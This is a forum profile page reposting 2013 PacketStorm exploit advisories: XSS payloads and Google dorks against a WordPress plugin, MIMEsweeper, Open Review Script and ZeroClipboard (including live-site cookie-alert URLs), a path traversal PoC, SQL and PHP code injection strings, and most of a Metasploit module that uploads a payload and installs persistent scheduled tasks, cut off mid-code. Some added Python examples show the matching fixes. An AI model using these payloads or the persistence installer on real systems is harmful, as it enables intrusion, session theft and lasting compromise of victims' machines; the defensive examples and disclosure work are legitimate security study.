Everything posted by Praetorian503

  1. WordPress Responsive Logo Slideshow plugin suffers from a cross site scripting vulnerability.

     #############################
     Exploit Title : Reflective/Stored XSS in Responsive Logo Slideshow Plugin Cross-Site Scripting Vulnerability
     Author: Aditya Balapure
     home: http://adityabalapure.blogspot.in/
     Date: 18/02/13
     software link: http://wordpress.org/extend/plugins/responsive-logo-slideshow/
     CVE Assigned - CVE-2013-1759
     #############################

     Responsive Logo Slideshow Plugin description

     The Responsive Logo Slideshow Plugin in Wordpress http://wordpress.org/extend/plugins/responsive-logo-slideshow/ has a Reflected/Stored? XSS Vulnerability in the URL and Image input box. If a malicious user is able to inject a script, it may affect each and every viewer who visits the website. Once a malicious user compromises the login credentials, he may use these input fields to store malicious scripts and thus carry on a passive attack.

     ##########################
     XSS location
     URL and Image input box.

     Script Used-
     ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
     ##########################

     Vendor Notification
     05/02/2013 - Vendor notified, awaiting action
     17/02/2013 - The Plugin has been removed from the repository by the Wordpress Team

     Source: PacketStorm
  2. MIMEsweeper for SMTP version 5.5 Personal Message Manager suffers from multiple cross site scripting vulnerabilities.

     Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)
     Vendor: Clearswift Ltd
     Vendor URL: http://www.clearswift.com/
     Category: Reflective XSS
     Google dork: inurl:/MSWPMM/
     Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]

     [Vulnerability Reproduction]
     1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
     2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
     3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
     4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
     5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
     6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
     7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
     8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
     9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
     10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>

     [Time-line]
     17/07/2009 - Initial discovery
     13/01/2012 - Notified vendor
     13/01/2012 - Vendor responded
     16/01/2012 - Vendor requested more information
     16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate
     16/01/2012 - Informed vendor of evaluation progress, v5.5.0 is vulnerable too
     17/01/2012 - Telephone conversation with vendor in regard to the findings
     17/01/2012 - Assigned vulnerability reference MSW-1459
     25/01/2012 - Requested status update
     25/01/2012 - Vendor replied "There is no update on MSW-1459."
     16/02/2012 - Requested status update
     26/02/2012 - Vendor replied "There is no update on MSW-1459."
     23/03/2012 - Requested status update
     23/03/2012 - Vendor replied "There is no update on MSW-1459."
     09/05/2012 - Requested status update and gave notice of public disclosure
     11/05/2012 - Vendor replied "There is no update on MSW-1459."
     18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team
     07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release
     07/06/2012 - Requested due date for next release
     12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012
     13/06/2012 - We suggested postponing the disclosure until after the patch is public
     06/12/2012 - Requested status update
     06/12/2012 - Vendor sent details for patch
     28/01/2013 - Patch is applicable for 5.5.1
     09/02/2012 - We requested a demo license to verify the fix
     15/02/2013 - Vendor could not produce a demo license for us to verify the fix
     15/02/2013 - Vendor closes incident ticket
     18/02/2013 - Public disclosure date

     Source: PacketStorm
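     Both advisories above (the stored plugin settings in item 1 and the reflected ASP.NET parameters in item 2) come down to one defect: a value controlled by the request is written into HTML, an attribute or a script block without encoding for that context. The following example is added here and is not code from either advisory or from the affected products; the slideshow-style markup, the function names and the sample URL are assumptions. It runs the polyglot quoted in item 1 through a vulnerable renderer and through a hardened one that encodes each value for the context it lands in.

```python
import html
import json
from urllib.parse import urlsplit

# Constructed sample input: the polyglot quoted as "Script Used" in the advisory above
XSS_PROBE = ("';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";"
             " alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--"
             " ></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>")


def render_slide_unsafe(url, title):
    """Vulnerable pattern: stored plugin settings dropped into markup and a script block verbatim."""
    return (f'<a href="{url}"><img src="{url}" title="{title}"></a>\n'
            f"<script>var slideTitle = '{title}';</script>")


def safe_url(url):
    """URL context: allow only absolute http(s) URLs; javascript:, data: and the like become empty."""
    url = url.strip()
    parts = urlsplit(url)
    return url if parts.scheme.lower() in ("http", "https") and parts.netloc else ""


def js_string_literal(value):
    """JS string context: a JSON literal with < > & escaped so no tag can form inside the script block."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_slide_safe(url, title):
    """Hardened form: each value is encoded for the exact context it lands in."""
    u = html.escape(safe_url(url), quote=True)   # attribute context, scheme allow-listed first
    t = html.escape(title, quote=True)           # attribute context, both quote styles escaped
    return (f'<a href="{u}"><img src="{u}" title="{t}"></a>\n'
            f"<script>var slideTitle = {js_string_literal(title)};</script>")


if __name__ == "__main__":
    print(render_slide_unsafe("javascript:alert(1)", XSS_PROBE))
    print(render_slide_safe("javascript:alert(1)", XSS_PROBE))
```

     The point the test exercises: after encoding, the probe survives only as inert text (`&lt;SCRIPT&gt;` in the attribute, `\u003cSCRIPT\u003e` inside the JS literal), the `javascript:` URL is dropped, and a legitimate title such as `Acme & Co` still renders correctly in both places.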
  3. Air Transfer 1.2.0 Local File Inclusion

     Title:
     ======
     Air Transfer v1.2.0 iPad iPhone - File Include Vulnerability

     Date:
     =====
     2013-02-14

     References:
     ===========
     http://www.vulnerability-lab.com/get_content.php?id=849

     VL-ID:
     =====
     849

     Common Vulnerability Scoring System:
     ====================================
     6.3

     Introduction:
     =============
     Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection! Air Transfer moves what you`re seeing or playing on Mac/PC to your iPhone/iPad with just a single drag&drop! It moves whatever you want; text memo, website address, photo, music, movie, document and so on. The transferred items are auto-classified into 7 categories according to their type. You can also see or play the items in Air Transfer right away! Air Transfer works even in background mode, you can switch to other apps without stopping the current transfer.

     (Copy of the Homepage: https://itunes.apple.com/de/app/air-transfer/id521595136 )

     Abstract:
     =========
     The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the mobile Air Transfer v1.2.0 app for the Apple iPad & iPhone.

     Report-Timeline:
     ================
     2013-02-14: Public Disclosure

     Status:
     ========
     Published

     Affected Products:
     ==================
     Apple AppStore
     Product: Air Transfer Application - (iPad & iPhone) 1.2.0

     Exploitation-Technique:
     =======================
     Remote

     Severity:
     =========
     High

     Details:
     ========
     A local file include web vulnerability via POST request method is detected in the mobile WirelessFiles v1.1 app for the Apple iPad & iPhone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files.

     The vulnerability is located in the upload file module of the webserver (http://192.168.0.10/) when processing a manipulated filename loaded via POST. The execution of the injected path or file request will occur when the attacker opens the generated links in the file dir listing. First the remote attacker drags & drops (copies) a manipulated link with a system path or local files to request. He adds the local file request and in the second step the attacker opens the generated link in the listing to execute the code out of the index module.

     Exploitation of the web vulnerability requires a low privileged application user account without user interaction. Successful exploitation of the vulnerability results in unauthorized path or file access via local file or path include attack.

     Vulnerable Application(s):
     [+] Air Transfer v1.2.0 - ITunes or AppStore (Apple)

     Vulnerable Module(s):
     [+] File Upload

     Vulnerable Function(s):
     [+] Drag&Drop & Listing (Web Server) [Remote]

     Vulnerable Parameter(s):
     [+] name (Drop Web Addr Here)
     [+] filename (Drop Web Addr Here)

     Affected Module(s):
     [+] Air Transfer Filename Index - Listing

     Proof of Concept:
     =================
     The local file include web vulnerability can be exploited by remote attackers without required user interaction and with a privileged application user account. For demonstration or reproduce ...

     Input: (Upload)
     http://192.168.0.10:8080/Upload

     Example:
     http://[Server]:[PORT]/[Local File or Path Include]

     PoC:
     http://192.168.0.10:8080/var/mobile/Applications/2D31A1B7-6A58-42CE-A5B2-EB7307BE5B6F/AirScrap2%20Lite.app/note.png
     ../var/mobile/Applications/2D31A1B7-6A58-42CE-A5B2-EB7307BE5B6F/AirScrap2 Lite.app/note.png

     --- POST ---
     =-----------------------------19781325924485
     Content-Disposition: form-data; name=``[Local File or Path Include]``; filename=``[Local File or Path Include].jpg``
     Content-Type: image/jpeg

     ÿØÿà
     192.168.0.10:8080
     ---

     Manual steps to reproduce ...
     1. Buy the application Air Transfer from the Apple app store
     2. Install the application and start the service on your iPad or iPhone
     3. Open the Air Transfer file dir service application http://192.168.0.10:8080/
     4. Start your browser session tamper tool to manipulate the POST request live
     5. Use the Drag&Drop function to upload via http://192.168.0.10:8080/Upload and choose any random file
     6. Submit the random picture and exchange the name and filename values (POST) with your local path or file request
     7. Refresh the index listing of the main service http://192.168.0.10:8080 and open the generated link with your path/file request
     8. The path or file will be loaded and is accessible
     9. The application can be compromised by mobile webshell uploads and other malicious and persistent injected context
     10. Successfully reproduced ... done!

     Risk:
     =====
     The security risk of the local file include web vulnerability is estimated as high(+).

     Credits:
     ========
     Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)

     Disclaimer:
     ===========
     The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

     Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
     Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
     Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
     Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
     Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

     Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get permission.

     Copyright © 2013 | Vulnerability Laboratory

     --
     VULNERABILITY RESEARCH LABORATORY
     LABORATORY RESEARCH TEAM
     CONTACT: research@vulnerability-lab.com

     Source: PacketStorm
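     The root cause in the advisory above is that the multipart `name`/`filename` fields are used to build a filesystem path unchanged, so a `../` prefix walks out of the upload area. The example below is added here and is not code from the advisory or from the Air Transfer app; the upload root `/var/app/uploads` and the function names are assumptions. It shows the vulnerable join beside a hardened version that decodes once, rejects any separator or dot-only name, and then proves containment with `commonpath` as a second check.

```python
import posixpath
from urllib.parse import unquote

# Constructed example root; the app's real on-device path is not on the page
UPLOAD_ROOT = "/var/app/uploads"


def resolve_unsafe(root, filename):
    """Vulnerable pattern: the client-supplied name is joined to the root unchanged,
    so '../' segments walk out of the upload directory."""
    return posixpath.normpath(posixpath.join(root, filename))


def safe_upload_path(root, filename):
    """Hardened form: decode once, treat backslashes as separators, reject anything
    that is not a single plain filename, then verify the result stays under root."""
    name = unquote(filename).replace("\\", "/")
    if "/" in name or "\x00" in name or name in ("", ".", ".."):
        raise ValueError(f"rejected filename {filename!r}")
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, name))
    # Belt and braces: even a future change to the checks above cannot let a path escape.
    if posixpath.commonpath([root_norm, candidate]) != root_norm:
        raise ValueError(f"path escapes {root_norm}: {candidate}")
    return candidate


def vet(filename):
    """Return ('ok', path) or ('rejected', reason) for a filename taken from a multipart upload."""
    try:
        return ("ok", safe_upload_path(UPLOAD_ROOT, filename))
    except ValueError as err:
        return ("rejected", str(err))


if __name__ == "__main__":
    # The traversal name from the advisory's PoC and a URL-encoded variant of the same trick
    for n in ("../var/mobile/x/note.png", "%2e%2e%2fetc%2fpasswd", "/etc/passwd", "note.png"):
        print(n, "->", resolve_unsafe(UPLOAD_ROOT, n), "|", vet(n))
```

     The strict reject-instead-of-sanitise choice is deliberate: silently stripping `../` and storing `note.png` would hide probing from the logs, whereas a rejection is an event worth alerting on.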
  4. Open Review Script suffers from a cross site scripting vulnerability.

     [ASCII-art banner: www.janissaries.org]

     «««:»»» Open Review Script-Cross Site Scripting (XSS) attacks «««:»»»

     ./Title Exploit : Open Review Script-Cross Site Scripting (XSS) attacks
     ./WebApps URL : http://openreviewscript.org/
     ./WebApps Download : http://openreviewscript.org/files/OpenReviewScript-v1.0.1.zip
     ./Author Exploit : [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ]
     ./Security Risk : [ High Level ]
     ./Category XPL : [ WebApps ]
     ./Time & Date : 18.02.2013. 10:300 PM.

     [~] Xss on Demo Site (Searchbox)
     http://openreviewscript.org/scriptdemo/results/search

     If you want to try, you may open the demo site and enter the XSS attack code in the Searchbox.
     CAPS http://www.hizliresimyukle.com/images/2013/02/18/d9YPV.png

     <ScRiPt >prompt(978524)</ScRiPt>
     <script>alert('TheMirkin')</script>

     [ Thanks For All ]
     Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)

     Source: PacketStorm
  5. Scripts Genie Pet Rate Pro version 4.9.9 suffers from remote SQL injection and code injection vulnerabilities.

     [ASCII-art banner: www.janissaries.org]

     # Author(Pentester): TheMirkin
     # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy)
     #------------------------------------------------------------------------
     # Exploit Title: Pet Rate Pro Multi Vulnerability
     # Google Dork:
     # Date:
     # scripts Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=pet_rate_pro
     # Version: 4.9.9
     #
     # Tested on: Win7,BackTrack5
     #
     ##=======================================================================

     #=> Exploit: SQL injection
     http://[target]/[path]//demo/PetRatePro/index.php?cmd=4

     Demo:
     URL encoded POST input username was set to 'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(82),CHAR(65),CHAR(101),CHAR(74),CHAR(100),CHAR(109),CHAR(55)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

     #=> Exploit: Code Injection
     http://[target]/[path]/index.php?cmd=10&ty="%3bprint(TheMirkin_janissaries_Pentester)%3b%24a%3d"

     Demo:
     http://scriptsgenie.com/demo/PetRatePro/index.php?cmd=10&ty=%22%3bprint%28TheMirkin_janissaries_Pentester%29%3b%24a%3d%22

     ##=======================================================================

     Source: PacketStorm
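     The SQL injection above works because the `username` POST field is concatenated into the query text, so a quote in the input ends the string literal and the rest is parsed as SQL. The example below is added here and is not code from the advisory or from Pet Rate Pro; the users table, the hashing and the function names are constructed for the demonstration, and SQLite stands in for the MySQL backend the advisory targets. It places the vulnerable login query beside the parameterised one and checks both against a quote-breaking username.

```python
import hashlib
import sqlite3


def _h(pw):
    """Toy password hash so the sample never stores plaintext (use a proper KDF in real code)."""
    return hashlib.sha256(pw.encode()).hexdigest()


def build_demo_db():
    """Constructed sample data: an in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)")
    conn.executemany("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
                     [("admin", _h("s3cret-admin")), ("bob", _h("hunter2"))])
    return conn


def login_unsafe(conn, username, password):
    """Vulnerable pattern, as in the advisory: request data spliced into the SQL text.
    A username of  admin' --  closes the literal and comments out the password check."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND pw_hash = '{_h(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Hardened form: placeholders hand the values to the driver as data, never as SQL."""
    row = conn.execute("SELECT id FROM users WHERE username = ? AND pw_hash = ?",
                       (username, _h(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_demo_db()
    print("unsafe:", login_unsafe(db, "admin' --", "wrong"))   # logs in without the password
    print("safe:  ", login_safe(db, "admin' --", "wrong"))     # no such user
```

     The error-based payload quoted in the advisory relies on MySQL-specific behaviour (`floor(rand(0)*2)` grouped in a subquery), but the fix is the same in every dialect: the query shape is fixed at compile time and inputs travel as bound parameters.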
  6. ZeroClipboard version 1.0.7 suffers from a cross site scripting vulnerability.

     Hello list!

     These are Cross-Site Scripting vulnerabilities in ZeroClipboard. Last week I did my research on these vulnerabilities and informed all developers (previous and current) of ZeroClipboard.

     I downloaded ZeroClipboard in September 2011, when I was writing my article "Attacks via clipboard" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008056.html), in which I wrote about different attacks via clipboard, such as XSS, CAS (which leads to DoS or Code Execution), attacks on download managers which monitor the clipboard (which leads to manual downloading of malware or even Automatic File Download), clipboard spamming, clipboard phishing and clipboard malwaring, and I mentioned it in the article: my examples of JavaScript code (for IE) or ActionScript code (for all browsers) can be used for such attacks, or ZeroClipboard can be used.

     -------------------------
     Affected products:
     -------------------------

     Vulnerable are ZeroClipboard 1.0.7 and previous versions. This concerns ZeroClipboard developed by the original author (Joseph Huckaby). There are new versions, developed by new authors (Jon Rohan and James M. Greene), in which they started fixing these vulnerabilities - one XSS in 1.0.8 and another in version 1.1.4. The last version, ZeroClipboard 1.1.7, is not affected.

     The original version by Joseph has two flash-files (ZeroClipboard.swf and ZeroClipboard10.swf) and the newer versions by Jon and James have only one flash-file (ZeroClipboard.swf).

     ----------
     Details:
     ----------

     In September 2011 I had not made any assessment of ZeroClipboard, so I drew attention only to XSS via copying to the buffer (it exists in test.html from the archive of the original ZeroClipboard, because the flash-application doesn't sanitize input before copying into the buffer, similarly as it can be used for the above-mentioned XSS attacks via pasting). This XSS can be triggered at the testing page, where information about the copied text is shown and XSS occurs, or at pasting into html-forms (as described in my article).

     Then hip made his assessment of ZeroClipboard recently (http://packetstormsecurity.com/files/119968/WordPress-WP-Table-Reloaded-Cross-Site-Scripting.html). He drew attention only to this flash-file in the WP-Table-Reloaded plugin for WordPress, but it's not just part of the plugin, it's a third-party application, which is used in multiple web applications and at multiple sites (standalone as well as in different webapps). So I'm giving detailed information about ZeroClipboard.

     I suggest, instead of hip's payload "a\%22))}catch(e){alert(1)}//", using my variant - in this case there will be no cycling of the alertbox.

     http://site/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

     Cross-Site Scripting (WASC-08):

     In WP-Table-Reloaded XSS works just with parameter id (this is a modified version of the swf-file, so there are different modifications of it). In the official version of ZeroClipboard it will not work without "&width&height", so it's needed to set all parameters.

     http://site/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
     http://site/ZeroClipboard10.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

     And XSS via copying an XSS payload into the buffer, described above.

     This is a very widespread flash-file (both versions), as you can find out via Google dorks.

     inurl:zeroclipboard.swf - about 80500 results
     inurl:zeroclipboard10.swf - about 9520 results

     Some of these zeroclipboard.swf can be newer versions (with fixed XSS), but tens of thousands of swf-files (and sites with them) are vulnerable. For the last 14,5 years I have seen ZeroClipboard and similar flash-files (for copying into the clipboard) at a lot of web sites. From small sites to large sites, such as slideshare.net (this is just one more hole among those multiple holes which I've informed them about during the last years, and they never care about the security of their site - either ignoring vulnerabilities, or quietly fixing one hole without any response - a typical lame approach, so this hole is going directly to full disclosure).

     http://www.slideshare.net/javascripts/plugins/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

     Best wishes & regards,
     MustLive
     Administrator of Websecurity web site
     http://websecurity.com.ua

     Source: PacketStorm
  7. This Metasploit module creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires 'Logon as a batch job' permissions (SeBatchLogonRight).

     ##
     # ## This file is part of the Metasploit Framework and may be subject to
     # redistribution and commercial restrictions. Please see the Metasploit
     # web site for more information on licensing and terms of use.
     # http://metasploit.com/
     ##

     require 'msf/core'
     require 'rex'
     require 'msf/core/post/common'
     require 'msf/core/post/file'
     require 'msf/core/post/windows/priv'
     require 'msf/core/exploit/exe'

     class Metasploit3 < Msf::Exploit::Local
       Rank = ExcellentRanking

       include Msf::Post::Common
       include Msf::Post::File
       include Msf::Post::Windows::Priv
       include Exploit::EXE

       def initialize(info={})
         super( update_info( info,
           'Name'           => 'Windows Manage User Level Persistent Payload Installer',
           'Description'    => %q{
               Creates a scheduled task that will run using service-for-user (S4U).
               This allows the scheduled task to run even as an unprivileged user
               that is not logged into the device. This will result in lower security
               context, allowing access to local resources only. The module requires
               'Logon as a batch job' permissions (SeBatchLogonRight).
           },
           'License'        => MSF_LICENSE,
           'Author'         =>
             [
               'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
               'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
             ],
           'Platform'       => [ 'windows' ],
           'SessionTypes'   => [ 'meterpreter' ],
           'Targets'        => [ [ 'Windows', {} ] ],
           'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post
           'DefaultTarget'  => 0,
           'References'     =>
             [
               [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'],
               [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/']
             ]
         ))

         # FREQUENCY and EXPIRE_TIME default to 0 so the "== 0" / "!= 0" checks below
         # see an integer rather than nil when the user leaves them unset
         register_options(
           [
             OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute', 0]),
             OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]),
             OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule', ['logon', 'lock', 'unlock', 'schedule', 'event']]),
             OptString.new('REXENAME', [false, 'Name of exe on remote system']),
             OptString.new('RTASKNAME', [false, 'Name of the scheduled task on remote system']),
             OptString.new('PATH', [false, 'PATH to write payload'])
           ], self.class)

         register_advanced_options(
           [
             OptString.new('EVENT_LOG', [false, 'Event trigger: The event log to check for event']),
             OptInt.new('EVENT_ID', [false, 'Event trigger: Event ID to trigger on.']),
             OptString.new('XPATH', [false, 'XPath query'])
           ], self.class)
       end

       def exploit
         if not (sysinfo['OS'] =~ /Build [6-9]\d\d\d/)
           fail_with(Exploit::Failure::NoTarget, "This module only works on Vista/2008 and above")
         end

         if datastore['TRIGGER'] == "event"
           if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil?
             print_status("The properties of any event in the event viewer will contain this information")
             fail_with(Exploit::Failure::BadConfig, "Advanced options EVENT_LOG and EVENT_ID required for event")
           end
         end

         # Generate payload
         payload = generate_payload_exe

         # Generate remote executable name
         rexename = generate_rexename

         # Generate path names
         xml_path, rexe_path = generate_path(rexename)

         # Upload REXE to victim fs
         upload_rexe(rexe_path, payload)

         # Create basic XML outline
         xml = create_xml(rexe_path)

         # Fix XML based on trigger
         xml = add_xml_triggers(xml)

         # Write XML to victim fs, if fail clean up
         write_xml(xml, xml_path, rexe_path)

         # Name task with Opt or give random name
         schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6))

         # Create task with modified XML
         create_task(xml_path, schname, rexe_path)
       end

       ##############################################################
       # Generate name for payload
       # Returns name
       def generate_rexename
         rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
         if not rexename =~ /\.exe$/
           print_warning("#{datastore['REXENAME']} isn't an exe")
         end
         return rexename
       end

       ##############################################################
       # Generate Path for payload upload
       # Returns path for xml and payload
       def generate_path(rexename)
         # generate a path to write payload and xml
         path = datastore['PATH'] || expand_path("%TEMP%")
         xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
         rexe_path = "#{path}\\#{rexename}"
         return xml_path, rexe_path
       end

       ##############################################################
       # Upload the executable payload
       # Returns boolean for success
       def upload_rexe(path, payload)
         vprint_status("Uploading #{path}")
         if file? path
           fail_with(Exploit::Failure::Unknown, "File #{path} already exists...exiting")
         end

         begin
           write_file(path, payload)
         rescue => e
           fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}")
         end
         print_status("Successfully uploaded remote executable to #{path}")
       end

       ##############################################################
       # Creates a scheduled task, exports as XML, deletes task
       # Returns normal XML for generic task
       def create_xml(rexe_path)
         xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml")
         xml_file = File.new(xml_path, "r")
         xml = xml_file.read
         xml_file.close

         # Get local time, not system time from victim machine
         begin
           vt = client.railgun.kernel32.GetLocalTime(32)
           ut = vt['lpSystemTime'].unpack("v*")
           t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
         rescue
           print_warning("Could not read system time from victim...using your local time to determine creation date")
           t = ::Time.now
         end

         date = t.strftime("%Y-%m-%d")
         time = t.strftime("%H:%M:%S")

         # put in correct times
         xml = xml.gsub(/DATEHERE/, "#{date}T#{time}")

         domain, user = client.sys.config.getuid.split('\\')

         # put in user information
         xml = xml.sub(/DOMAINHERE/, user)
         xml = xml.sub(/USERHERE/, "#{domain}\\#{user}")
         xml = xml.sub(/COMMANDHERE/, rexe_path)

         return xml
       end

       ##############################################################
       # Takes the XML, alters it based on trigger specified. Will also
       # add in expiration tag if used.
       # Returns the modified XML
       def add_xml_triggers(xml)
         # Insert trigger
         case datastore['TRIGGER']
         when 'logon'
           # Trigger based on winlogon event, checks windows license key after logon
           print_status("This trigger triggers on event 4101 which validates the Windows license")
           line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]"
           xml = create_trigger_event_tags("Application", line, xml)
         when 'lock'
           xml = create_trigger_tags("SessionLock", xml)
         when 'unlock'
           xml = create_trigger_tags("SessionUnlock", xml)
         when 'event'
           line = "*[System[(EventID=#{datastore['EVENT_ID']})]]"
           if not datastore['XPATH'].nil? and not datastore['XPATH'].empty?
             # Append xpath queries
             line << " and #{datastore['XPATH']}"
             # Print XPath query, useful to user to spot issues with uncommented single quotes
             print_status("XPath query: #{line}")
           end
           xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml)
         when 'schedule'
           # Change interval tag, insert into XML
           if datastore['FREQUENCY'] != 0
             minutes = datastore['FREQUENCY']
           else
             print_status("Defaulting frequency to every hour")
             minutes = 60
           end
           xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<")

           # Insert expire tag if not 0
           unless datastore['EXPIRE_TIME'] == 0
             # Generate expire tag
             end_boundary = create_expire_tag
             # Inject expire tag
             insert = xml.index("</StartBoundary>")
             xml.insert(insert + 16, "\n      #{end_boundary}")
           end
         end

         return xml
       end

       ##############################################################
       # Creates end boundary tag which expires the trigger
       # Returns XML for expire
       def create_expire_tag()
         # Get local time, not system time from victim machine
         begin
           vt = client.railgun.kernel32.GetLocalTime(32)
           ut = vt['lpSystemTime'].unpack("v*")
           t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
         rescue
           print_error("Could not read system time from victim...using your local time to determine expire date")
           t = ::Time.now
         end

         # Create time object to add expire time to and create tag
         t = t + (datastore['EXPIRE_TIME'] * 60)
         date = t.strftime("%Y-%m-%d")
         time = t.strftime("%H:%M:%S")
         end_boundary = "<EndBoundary>#{date}T#{time}</EndBoundary>"

         return end_boundary
       end

       ##############################################################
       # Creates trigger XML for session state triggers and replaces
       # the time trigger.
       # Returns altered XML
       def create_trigger_tags(trig, xml)
         domain, user = client.sys.config.getuid.split('\\')

         # Create session state trigger, weird spacing used to maintain
         # natural Windows spacing for XML export
         temp_xml = "<SessionStateChangeTrigger>\n"
         temp_xml << "      #{create_expire_tag}\n" unless datastore['EXPIRE_TIME'] == 0
         temp_xml << "      <Enabled>true</Enabled>\n"
         temp_xml << "      <StateChange>#{trig}</StateChange>\n"
         temp_xml << "      <UserId>#{domain}\\#{user}</UserId>\n"
         temp_xml << "    </SessionStateChangeTrigger>"

         xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml)

         return xml
       end

       ##############################################################
       # Creates trigger XML for event based triggers and replaces
